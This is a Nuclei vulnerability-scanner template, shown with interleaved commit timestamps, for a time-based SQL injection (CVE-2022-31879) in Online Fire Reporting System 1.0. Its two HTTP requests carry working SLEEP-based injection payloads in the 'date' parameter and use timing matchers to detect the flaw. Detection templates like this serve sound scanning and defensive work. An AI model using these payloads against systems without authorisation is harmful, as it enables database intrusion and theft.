nuclei-templates/http/cves/2022/CVE-2022-31879.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2023-06-05 07:03:16 +00:00
id: CVE-2022-31879
info:
name: Online Fire Reporting System v1.0 - SQL injection
2023-08-12 08:18:49 +00:00
author: theamanrawat,j4vaovo
2023-06-05 07:03:16 +00:00
severity: high
description: |
Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
2023-06-05 07:03:16 +00:00
reference:
- https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-31879
cwe-id: CWE-89
epss-score: 0.05592
epss-percentile: 0.92411
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
2023-06-05 07:03:16 +00:00
metadata:
2023-08-22 11:18:17 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
2023-06-05 07:03:16 +00:00
tags: cve,cve2022,sqli,online-fire-reporting
http:
- raw:
- |
2023-08-12 08:18:49 +00:00
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1
2023-06-05 07:03:16 +00:00
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
2023-08-14 05:09:29 +00:00
- 'status_code_1 == 200 && status_code_2 == 200'
2023-08-12 08:18:49 +00:00
- 'duration_2 - duration_1 >= 7'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Dashboard")'
2023-06-05 07:03:16 +00:00
condition: and
# digest: 4b0a00483046022100a40c724d6cffd8cb95a246148cd0cb2d10ea9156e3e94182e924f69126d2976d0221008db7a788cc282797ff4837291dc62947681e43dacc5c6ef7fc827c21ed501b37:922c64590222798bb761d5b6d8e72950